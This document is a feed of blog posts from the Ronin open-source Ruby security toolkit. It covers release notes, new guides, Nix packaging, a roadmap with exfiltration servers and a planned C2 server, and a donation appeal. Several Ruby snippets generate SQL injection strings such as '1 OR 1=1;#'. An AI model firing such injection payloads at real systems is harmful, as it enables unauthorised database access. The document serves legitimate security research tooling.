ronin-vulns 0.1.3 released!2023-07-07 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/07/07/ronin-vulns-0-1-3-released.html<p><a href="https://github.com/ronin-rb/ronin-vulns#readme">ronin-vulns</a> <a href="https://github.com/ronin-rb/ronin-vulns/releases/tag/v0.1.3">0.1.3</a> has been released!
This version contains minor bug fixes to the Server-Side Template Injection
(SSTI) and SQL injection (SQLi) classes. Also a special thanks to our latest
contributor, <a href="https://github.com/quadule">@quadule</a>, for adding improved detection of reflected XSS
occurring after or <em>inside of</em> HTML comments.</p>
<h2 id="updating">Updating</h2>
<p>To update <a href="https://github.com/ronin-rb/ronin-vulns#readme">ronin-vulns</a>, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>gem update ronin-vulns
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
ronin-code-sql 2.1.0 released!2023-06-26 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/06/26/ronin-code-sql-2-1-0-released.html<p><a href="https://github.com/ronin-rb/ronin-code-sql#readme">ronin-code-sql</a> <a href="https://github.com/ronin-rb/ronin-code-sql/releases/tag/v2.1.0">2.1.0</a> has been released!</p>
<h2 id="new-features">New Features</h2>
<p>The <code class="language-plaintext highlighter-rouge">Ronin::Code::SQLI</code> constant alias was added:</p>
<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">Code</span><span class="o">::</span><span class="no">SQLI</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">or</span> <span class="p">{</span> <span class="mi">1</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1 OR 1=1</span>
</code></pre></div></div>
<p>The [Ronin::Code::SQL::Mixin] module was added that can add the <code class="language-plaintext highlighter-rouge">sql</code> and <code class="language-plaintext highlighter-rouge">sqli</code>
methods to any class.</p>
<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">require</span> <span class="s1">'ronin/code/sql/mixin'</span>
<span class="k">class</span> <span class="nc">MyClass</span>
<span class="kp">include</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">Code</span><span class="o">::</span><span class="no">SQL</span><span class="o">::</span><span class="no">Mixin</span>
<span class="k">def</span> <span class="nf">build_sqli</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">or</span> <span class="p">{</span> <span class="mi">1</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span>
<span class="k">end</span>
<span class="k">end</span>
</code></pre></div></div>
<p>Thanks to our newest contributor, <a href="https://github.com/lena64t">@lena64t</a>, <a href="https://github.com/ronin-rb/ronin-code-sql#readme">ronin-code-sql</a> received two new
features:</p>
<p>Generating SQL injection with custom comments:</p>
<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">Code</span><span class="o">::</span><span class="no">SQLI</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">or</span> <span class="p">{</span> <span class="mi">1</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}</span>
<span class="nb">puts</span> <span class="n">sqli</span><span class="p">.</span><span class="nf">to_sql</span><span class="p">(</span><span class="ss">terminate: </span><span class="kp">true</span><span class="p">,</span> <span class="ss">comment: </span><span class="s1">'#'</span><span class="p">)</span>
<span class="c1"># 1 OR 1=1 OR 1=1;#</span>
</code></pre></div></div>
<p>Added support for the <code class="language-plaintext highlighter-rouge">ORDER BY</code> clause:</p>
<div class="language-ruby highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="n">sqli</span> <span class="o">=</span> <span class="no">Ronin</span><span class="o">::</span><span class="no">Code</span><span class="o">::</span><span class="no">SQLI</span><span class="p">.</span><span class="nf">new</span>
<span class="n">sqli</span><span class="p">.</span><span class="nf">or</span> <span class="p">{</span> <span class="mi">1</span> <span class="o">==</span> <span class="mi">1</span> <span class="p">}.</span><span class="nf">order_by</span><span class="p">(</span><span class="mi">10</span><span class="p">)</span>
<span class="nb">puts</span> <span class="n">sqli</span>
<span class="c1"># 1 OR 1=1 ORDER BY (10)</span>
</code></pre></div></div>
<h2 id="updating">Updating</h2>
<p>To update <a href="https://github.com/ronin-rb/ronin-code-sql#readme">ronin-code-sql</a>, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>gem update ronin-code-sql
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
New Guides: Porting Python and Pwnlib to Ronin2023-06-16 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/06/16/new-guides-porting-python-and-pwnlib-to-ronin.html<p>Are you a Python developer interested in Ruby? Are you tired of writing the
same old code over and over again in Python or with Pwnlib? Interested in what
Ruby or Ronin can do? Well two new quick reference guides were added to the
<a href="/docs/#porting">Porting</a> section to help you out:</p>
<ul>
<li><a href="/docs/porting/python-to-ronin-quick-ref/">Porting Python to Ronin Quick Ref</a></li>
<li><a href="/docs/porting/pwnlib-to-ronin-quick-ref/">Porting Pwnlib to Ronin Quick Ref</a></li>
</ul>
ronin-payloads 0.1.3, ronin-exploits 1.0.2, and ronin 2.0.3 released2023-06-12 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/06/12/ronin-2-0-3-released.html<p><a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> <a href="https://github.com/ronin-rb/ronin-payloads/releases/tag/v0.1.3">0.1.3</a>,
<a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> <a href="https://github.com/ronin-rb/ronin-exploits/releases/tag/v1.0.2">1.0.2</a>,
<a href="https://github.com/ronin-rb/ronin#readme">ronin</a> <a href="https://github.com/ronin-rb/ronin/releases/tag/v2.0.3">2.0.3</a> have been released.
These releases contain a few CLI bug fixes, primarily a fix for a regression
in the <code class="language-plaintext highlighter-rouge">ronin irb</code> command that caused <a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a>’s Mixin methods
(ex: <code class="language-plaintext highlighter-rouge">http_get</code>) to disappear.</p>
<p>To update <code class="language-plaintext highlighter-rouge">ronin</code>, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>gem update ronin
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
New guides!2023-06-12 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/06/12/new-guides.html<p>Ronin now has eight brand new <a href="/docs/#guides">guides</a>!</p>
<ul>
<li><a href="/docs/guides/getting-started/">Getting Started</a> -
Explains how to install Ronin.</li>
<li><a href="/docs/guides/using-the-ronin-cli/">Using the Ronin CLI</a> -
Explains how to use Ronin’s many commands and sub-commands.</li>
<li><a href="/docs/guides/using-the-ronin-ruby-shell/">Using the Ronin Ruby Shell</a> -
Explains how to use Ronin’s interactive Ruby Shell.</li>
<li><a href="/docs/guides/using-ronin-repos/">Using ronin-repos</a> -
Explains how to install and manage 3rd-party git repositories that can contain
exploits or payloads.</li>
<li><a href="/docs/guides/using-ronin-db/">Using ronin-db</a> -
Explains how to interact with Ronin’s built-in database.</li>
<li><a href="/docs/guides/ruby-quick-ref/">Ruby Quick Ref</a> -
Provides a quick reference of Ruby’s syntax.</li>
<li><a href="/docs/guides/writing-ronin-ruby-scripts/">Writing Ronin Ruby Scripts</a> -
Explains how to write Ruby scripts using <a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a>.</li>
<li><a href="/docs/porting/metasploit-payloads-to-ronin-payloads/">Porting Metasploit Payloads to Ronin Payloads</a> -
Explains how to port Metasploit Payloads to <a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a>.</li>
</ul>
<p>Now Ronin has <strong>four</strong> different forms of documentation:
the <a href="https://github.com/ronin-rb/">project README files on GitHub</a>, the built-in man-pages,
the <a href="/docs/#API">API docs</a>, and now <a href="/docs/#guides">guides</a>.</p>
ronin-support 1.0.2, ronin-repos 0.1.1, ronin-payloads 0.1.2, ronin-db 0.1.1, and ronin 2.0.2 released2023-06-09 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/06/09/ronin-2-0-2-released.html<p><a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> <a href="https://github.com/ronin-rb/ronin-support/releases/tag/v1.0.2">1.0.2</a>,
<a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a> <a href="https://github.com/ronin-rb/ronin-repos/releases/tag/v0.1.1">0.1.1</a>,
<a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> <a href="https://github.com/ronin-rb/ronin-payloads/releases/tag/v0.1.2">0.1.2</a>,
<a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a> <a href="https://github.com/ronin-rb/ronin-db/releases/tag/v0.1.1">0.1.1</a>, and
<a href="https://github.com/ronin-rb/ronin#readme">ronin</a> <a href="https://github.com/ronin-rb/ronin/releases/tag/v2.0.2">2.0.2</a> have been released.
These releases contain a few bug fixes, but mostly documentation improvements
and fixes.</p>
<p>To update <code class="language-plaintext highlighter-rouge">ronin</code>, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>gem update ronin
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
New Guide: Porting Metasploit Exploits to Ronin Exploits2023-05-31 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/05/31/new-guide-porting-metasploit-exploits-to-ronin-exploits.html<p>Ever wondered how to port an existing Metasploit exploit to <a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a>?
Well, we now have a guide for that!</p>
<p><a href="/docs/porting/metasploit-exploits-to-ronin-exploits/">Porting Metasploit Exploits to Ronin Exploits</a></p>
<p>This guide will cover each part of a Metasploit Exploit and show what the
<a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> equivalent code looks like.</p>
<h2 id="what-is-ronin-exploits">What is ronin-exploits?</h2>
<p><a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> is a Ruby micro-framework for writing and running exploits.
ronin-exploits allows one to write exploits as plain old Ruby classes.
ronin-exploits can be distributed as Ruby files or as git repositories that can
be installed using <a href="https://github.com/ronin-rb/ronin-repos#readme">ronin-repos</a>.</p>
<p><strong>tl;dr</strong> It’s like a simpler and more modular version of
<a href="https://www.metasploit.com/">Metasploit</a>.</p>
Ronin now available on Nix!2023-05-30 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/05/30/ronin-now-available-on-nix.html<p>Thanks to one of our contributors, <a href="https://github.com/Ch1keen">@Ch1keen</a>, Ronin is now available on
<a href="https://nixos.org/">Nix</a>!</p>
<h2 id="what-is-nix">What is Nix?</h2>
<p><a href="https://nixos.org/">Nix</a> is a cross-platform package manager which helps you install sets of
packages into self-contained directories, instead of globally. Nix can be
installed on macOS and Linux, along side the system’s package manager.</p>
<h2 id="what-is-ronin">What is Ronin?</h2>
<p><a href="https://github.com/ronin-rb/ronin#readme">Ronin</a> is a Free and Open Source <a href="https://www.ruby-lang.org/">Ruby</a> Toolkit for Security Research
and Development. Ronin contains many different <a href="https://github.com/ronin-rb/ronin#synopsis">CLI commands</a>
and <a href="https://github.com/ronin-rb/">Ruby libraries</a> for a variety of security tasks, such as
encoding/decoding data, filter IPs/hosts/URLs, querying ASNs, querying DNS,
HTTP, <a href="https://github.com/ronin-rb/ronin-vulns#synopsis">scanning for web vulnerabilities</a>,
<a href="https://github.com/ronin-rb/ronin-web-spider#readme">spidering websites</a>,
<a href="https://github.com/ronin-rb/ronin-repos#synopsis">install 3rd party repositories</a> of
<a href="https://github.com/ronin-rb/ronin-exploits#readme">exploits</a> and/or
<a href="https://github.com/ronin-rb/ronin-payloads#readme">payloads</a>, <a href="https://github.com/ronin-rb/ronin-exploits#synopsis">run exploits</a>,
<a href="https://github.com/ronin-rb/ronin-exploits#examples">write new exploits</a>,
<a href="https://github.com/ronin-rb/ronin-db#synopsis">managing local databases</a>,
<a href="https://github.com/ronin-rb/ronin-fuzzer#readme">fuzzing data</a>, and much more.</p>
<h2 id="install">Install</h2>
<p>Nix users can install Ronin globally with:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nix-env <span class="nt">-iA</span> nixpkgs.ronin
</code></pre></div></div>
<p>If you instead want to use <code class="language-plaintext highlighter-rouge">ronin</code> in a virtual environment temporarily:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>nix-shell <span class="nt">-p</span> ronin
</code></pre></div></div>
<p>See the <a href="/install/nix/">Ronin Nix installation instructions</a> for detailed
instructions.</p>
Announcing Phase 22023-04-16 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/04/16/announcing-phase-2.html<p>Now that <a href="/blog/2022/01/29/announcing-the-big-refactor.html">The Big Refactor</a> has been completed and <a href="/blog/2023/02/01/ronin-2-0-0-finally-released.html">Ronin 2.0.0</a> has been
released, it is now time to start focusing on the next big set of new features.
I am calling this next big push “Phase 2”; think of <a href="/blog/2022/01/29/announcing-the-big-refactor.html">The Big Refactor</a> as
“Phase 1”.</p>
<h2 id="high-level-plan">High-Level Plan</h2>
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Import data from more external tools into the <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><code class="language-plaintext highlighter-rouge">nmap</code></li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" /><code class="language-plaintext highlighter-rouge">masscan</code></li>
</ul>
</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Create a modular, recursive, and async recon engine.
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Add additional worker classes for port scanning, subdomain enumeration,
directory enumeration, etc.</li>
</ul>
</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Create a modular rule-based security scanning engine.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Create a protocol agnostic C2.
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Initially support TCP, HTTP, and DNS, but should allow supporting <em>any</em>
transport protocol.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Initially support JSON RPC 2.0 as the command message format, but should
allow supporting <em>any</em> C2 command message format.</li>
</ul>
</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Create a local-only web interface for Ronin.
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Allow searching and navigating <em>all</em> of <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a> and it’s many models.</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Allow performing <code class="language-plaintext highlighter-rouge">nmap</code> scans and importing the data into the
<a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Map <em>all</em> of <code class="language-plaintext highlighter-rouge">nmap</code>’s options to HTTP form fields.</li>
</ul>
</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Allow performing <code class="language-plaintext highlighter-rouge">masscan</code> scans and importing the data into the
<a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Map <em>all</em> of <code class="language-plaintext highlighter-rouge">masscan</code>’s options to HTTP form fields.</li>
</ul>
</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" checked="checked" />Allow spidering websites and import every URL into the <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.
<ul class="task-list">
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Map <em>all</em> of <a href="https://github.com/ronin-rb/ronin-web-spider#readme">ronin-web-spider</a>’s options to HTTP form fields.</li>
</ul>
</li>
<li class="task-list-item"><input type="checkbox" class="task-list-item-checkbox" disabled="disabled" />Allow performing recon and importing the results into the <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
</ul>
</li>
</ul>
<h2 id="new-libraries">New Libraries</h2>
<ul>
<li><a href="https://github.com/ronin-rb/ronin-dns-proxy#readme">ronin-dns-proxy</a> (Done) - A configurable DNS proxy server library.</li>
<li><a href="https://github.com/ronin-rb/ronin-exfil-dns#readme">ronin-exfil-dns</a> (Done) - A DNS server for receiving exfiltrated data.</li>
<li><a href="https://github.com/ronin-rb/ronin-exfil-http#readme">ronin-exfil-http</a> (Done) - A HTTP server for receiving exfiltrated data.</li>
<li><a href="https://github.com/ronin-rb/ronin-exfil#readme">ronin-exfil</a> (Done) - A Ruby CLI utility for receiving exfiltrated data.</li>
<li><a href="https://github.com/ronin-rb/ronin-web-session_cookie#readme">ronin-web-session_cookie</a> (Done) - A library for parsing and deserializing
various session cookies.</li>
<li><a href="https://github.com/ronin-rb/ronin-wordlists#readme">ronin-wordlists</a> (WIP) - A tool for managing and downloading wordlists.</li>
<li><a href="https://github.com/ronin-rb/ronin-nmap#readme">ronin-nmap</a> (WIP) - A tool for automating nmap, and querying or importing nmap XML into <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
<li><a href="https://github.com/ronin-rb/ronin-masscan#readme">ronin-masscan</a> (WIP) - A tool for automating masscan, and querying or importing masscan output files into <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
<li><a href="https://github.com/ronin-rb/ronin-recon#readme">ronin-recon</a> (WIP) - A modular recursive recon engine.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-scanner</code> (Planned) - A modular scanner engine that can be hooked up to <code class="language-plaintext highlighter-rouge">ronin-recon</code>.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-c2</code> (Prototyping) - A protocol agnostic C2 server.</li>
<li><a href="https://github.com/ronin-rb/ronin-app#readme">ronin-app</a> (WIP) - A local Web App for automated recon, scanning, and exploring the <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
</ul>
<p>If you want to see the complete list of GitHub Issues or see what is currently
being worked on, checkout the <a href="https://github.com/orgs/ronin-rb/projects/9">GitHub Project Board</a>. If any of these
new projects seem interesting to you, consider joining our <a href="https://discord.gg/6WAb3PsVX9">Discord</a> server and
getting involved.</p>
Ronin is now on Open Collective!2023-04-11 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/04/11/ronin-is-now-on-opencollective.html<p>Ronin is now accepting donations on <a href="https://opencollective.com/ronin-rb">Open Collective</a>! If you want to support
Ronin, consider financially supporting the project so that we can continue
building high-quality Open Source security tools and libraries in Ruby.</p>
<ul>
<li><a href="https://opencollective.com/ronin-rb/contribute/backer-50823/checkout?interval=month&amount=5&contributeAs=postmodern">Become a backer for as low as $5 per-month</a></li>
<li><a href="https://opencollective.com/ronin-rb/contribute/sponsor-50824/checkout">Become a sponsor starting at $100 per-month</a></li>
<li><a href="https://opencollective.com/ronin-rb/donate?interval=oneTime&amount=20&contributeAs=postmodern">Make a one-time donation for as low as $5</a></li>
</ul>
<h2 id="what-is-ronin">What is Ronin?</h2>
<p><a href="https://github.com/ronin-rb/ronin#readme">Ronin</a> is a free and Open Source <a href="https://www.ruby-lang.org/">Ruby</a> toolkit for security research and development. Ronin contains many different <a href="https://github.com/ronin-rb/ronin#synopsis">CLI commands</a> and <a href="https://github.com/ronin-rb/">Ruby libraries</a> for a variety of security tasks, such as encoding/decoding data, filter IPs/hosts/URLs, querying ASNs, querying DNS, HTTP, <a href="https://github.com/ronin-rb/ronin-vulns#synopsis">scanning for web vulnerabilities</a>, <a href="https://github.com/ronin-rb/ronin-web-spider#readme">spidering websites</a>,
<a href="https://github.com/ronin-rb/ronin-repos#synopsis">install 3rd party repositories</a> of <a href="https://github.com/ronin-rb/ronin-exploits#readme">exploits</a> and/or <a href="https://github.com/ronin-rb/ronin-payloads#readme">payloads</a>, <a href="https://github.com/ronin-rb/ronin-exploits#synopsis">run exploits</a>, <a href="https://github.com/ronin-rb/ronin-exploits#examples">write new exploits</a>, <a href="https://github.com/ronin-rb/ronin-db#synopsis">managing local databases</a>, <a href="https://github.com/ronin-rb/ronin-fuzzer#readme">fuzzing data</a>, and much more.</p>
<h2 id="how-is-ronin-different-from-other-security-projects">How is Ronin different from other security projects?</h2>
<ol>
<li><strong>High Quality:</strong> We take code quality <strong>very</strong> serious. All Ronin libraries have a test coverage of >90% and a documentation coverage of >80%. Additionally, Ronin libraries also have a very small memory footprint, making them ideal for constrained environments.</li>
<li><strong>Ruby Supercharged:</strong> Ronin builds on top of Ruby and adds even more libraries, classes, and methods to make Ruby even easier to use and more powerful!</li>
<li><strong>Fully Scriptable:</strong> Ronin is made up of different Ruby libraries and powerful APIs, all fully documentated, that you can use in Ruby scripts or in the Ruby console.</li>
<li><strong>Powerful CLI:</strong> Ronin provides <strong>many</strong> powerful CLI commands for performing various tasks. You don’t have to know Ruby to be able to use Ronin.</li>
<li><strong>Modular Design:</strong> Ronin has a modular architecture, so if you just want to use one part of Ronin, you can simply install that one library.</li>
<li><strong>Distributed:</strong> Ronin supports installing <a href="https://github.com/ronin-rb/ronin-repos#readme">3rd party git repositories</a> of exploits, payloads, or other modules.</li>
</ol>
<h2 id="why-is-supporting-ronin-important">Why is supporting Ronin important?</h2>
<p>Supporting the Ronin project financially helps us continue to improve the existing tools and libraries, as well as develop new tools and libraries.</p>
<h2 id="what-are-some-new-projects-you-have-planned">What are some new projects you have planned?</h2>
<ul>
<li><code class="language-plaintext highlighter-rouge">ronin-wordlists</code> - a tool for managing and downloading wordlists.</li>
<li><a href="https://github.com/ronin-rb/ronin-nmap#readme">ronin-nmap</a> (WIP) - a tool for automating nmap, and querying or importing nmap XML into <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
<li><a href="https://github.com/ronin-rb/ronin-masscan#readme">ronin-masscan</a> (WIP) - a tool for automating masscan, and querying or importing masscan output files into <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
<li><a href="https://github.com/ronin-rb/ronin-recon#readme">ronin-recon</a> (WIP) - a modular recursive recon engine.</li>
<li><code class="language-plaintext highlighter-rouge">ronin-scanner</code> - a modular scanner engine that can be hooked up to <code class="language-plaintext highlighter-rouge">ronin-recon</code>.</li>
<li><a href="https://github.com/ronin-rb/ronin-app#readme">ronin-app</a> (WIP) - a local Web App for automated recon, scanning, and exploring the <a href="https://github.com/ronin-rb/ronin-db#readme">ronin-db</a>.</li>
<li>Ronin Manual - a Git Book that covers all of the various ronin libraries and CLI tools.</li>
</ul>
ronin 2.0.1, ronin-exploits 1.0.1, ronin-payloads 0.1.1, ronin-vulns 0.1.2, ronin-web 1.0.1, ronin-web-server 0.1.1, ronin-core 0.1.1, and ronin-support 1.0.1 released2023-03-01 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/03/01/ronin-2-0-1-released.html<p>After a month of usage and collecting valuable user feedback,
<a href="https://github.com/ronin-rb/ronin#readme">ronin</a> <a href="https://rubygems.org/gems/ronin/versions/2.0.1">2.0.1</a>,
<a href="https://github.com/ronin-rb/ronin-exploits#readme">ronin-exploits</a> <a href="https://rubygems.org/gems/ronin-exploits/versions/1.0.1">1.0.1</a>,
<a href="https://github.com/ronin-rb/ronin-payloads#readme">ronin-payloads</a> <a href="https://rubygems.org/gems/ronin-payloads/versions/0.1.1">0.1.1</a>,
<a href="https://github.com/ronin-rb/ronin-vulns#readme">ronin-vulns</a> <a href="https://rubygems.org/gems/ronin-vulns/versions/0.1.2">0.1.2</a>,
<a href="https://github.com/ronin-rb/ronin-web#readme">ronin-web</a> <a href="https://rubygems.org/gems/ronin-web/versions/1.0.1">1.0.1</a>,
<a href="https://github.com/ronin-rb/ronin-web-server#readme">ronin-web-server</a> <a href="https://rubygems.org/gems/ronin-server/versions/0.1.1">0.1.1</a>,
<a href="https://github.com/ronin-rb/ronin-core#readme">ronin-core</a> <a href="https://rubygems.org/gems/ronin-core/versions/0.1.1">0.1.1</a>,
<a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> <a href="https://rubygems.org/gems/ronin-support/versions/1.0.1">1.0.1</a>
have been released. These new releases are patch releases meant to address
minor bugs discovered after the previous version releases.</p>
<p>To update <code class="language-plaintext highlighter-rouge">ronin</code>, simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nb">sudo </span>gem update ronin
</code></pre></div></div>
<p>The <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a> have also been updated. To update the docker images,
simply run:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>docker pull roninrb/ronin
</code></pre></div></div>
Ronin 2.0.0 finally released!2023-02-01 00:00:00 +0000postmodernhttp://ronin-rb.github.io/blog/2023/02/01/ronin-2-0-0-finally-released.html<p>After nearly a full year of non-stop development since the initial
announcement of <a href="/blog/2022/01/29/announcing-the-big-refactor.html">The Big Refactor</a>, <strong>4153</strong> commits made,
<a href="https://github.com/orgs/ronin-rb/projects/2">700 issues closed</a>, and a month of beta testing,
<a href="https://github.com/ronin-rb/ronin#readme">Ronin</a> <a href="https://rubygems.org/gems/ronin/versions/2.0.0">2.0.0</a> has <em>finally</em> been released!</p>
<h2 id="what-is-ronin">What is Ronin?</h2>
<p><a href="https://github.com/ronin-rb/ronin#readme">Ronin</a> is a Free and Open Source <a href="https://www.ruby-lang.org/">Ruby</a> Toolkit for Security Research
and Development. Ronin contains many different <a href="https://github.com/ronin-rb/ronin#synopsis">CLI commands</a>
and <a href="https://github.com/ronin-rb">Ruby libraries</a> for a variety of security tasks, such as
encoding/decoding data, filter IPs/hosts/URLs, querying ASNs, querying DNS,
HTTP, <a href="https://github.com/ronin-rb/ronin-vulns#synopsis">scanning for web vulnerabilities</a>,
<a href="https://github.com/ronin-rb/ronin-web-spider#readme">spidering websites</a>,
<a href="https://github.com/ronin-rb/ronin-repos#synopsis">install 3rd party repositories</a> of
<a href="https://github.com/ronin-rb/ronin-exploits#readme">exploits</a> and/or
<a href="https://github.com/ronin-rb/ronin-payloads#readme">payloads</a>, <a href="https://github.com/ronin-rb/ronin-exploits#synopsis">run exploits</a>,
<a href="https://github.com/ronin-rb/ronin-exploits#examples">write new exploits</a>,
<a href="https://github.com/ronin-rb/ronin-db#synopsis">managing local databases</a>,
<a href="https://github.com/ronin-rb/ronin-fuzzer#readme">fuzzing data</a>, and much more.</p>
<h2 id="install">Install</h2>
<p><a href="https://github.com/ronin-rb/ronin#readme">Ronin</a> can be installed via the <a href="https://github.com/ronin-rb/scripts#ronin-installsh"><code class="language-plaintext highlighter-rouge">ronin-install.sh</code></a>
installer bash script:</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code>curl <span class="nt">-o</span> ronin-install.sh https://raw.githubusercontent.com/ronin-rb/scripts/main/ronin-install.sh <span class="o">&&</span> bash ronin-install.sh
</code></pre></div></div>
<h3 id="docker">Docker</h3>
<p><a href="https://github.com/ronin-rb/ronin#readme">Ronin</a> also has <a href="https://hub.docker.com/r/roninrb/ronin">docker images</a>, if you prefer using <a href="https://www.docker.com/">docker</a>.</p>
<div class="language-shell highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="nv">$ </span>docker pull roninrb/ronin
<span class="nv">$ </span>docker run <span class="nt">-it</span> roninrb/ronin
root@89b5d7f15855:/# ronin <span class="nb">help</span>
</code></pre></div></div>
<h2 id="whats-new">What’s New?</h2>
<ul>
<li>Many new APIs were added to <a href="https://github.com/ronin-rb/ronin-support#readme">ronin-support</a> that allow working with
<a href="/docs/ronin-support/Ronin/Support/Encoding.html">various data encodings</a>,
<a href="/docs/ronin-support/Ronin/Support/Binary.html">encoding/decoding binary data</a>,
<a href="/docs/ronin-support/Ronin/Support/Binary/BitFlip.html">bit-flipping</a>,
<a href="/docs/ronin-support/Ronin/Support/Crypto.html">cryptography</a>,
<a href="/docs/ronin-support/Ronin/Support/Compression.html">compressing/uncompressing data</a>,
<a href="/docs/ronin-support/Ronin/Support/Archive.html">reading/writing tar/zip archives</a>,
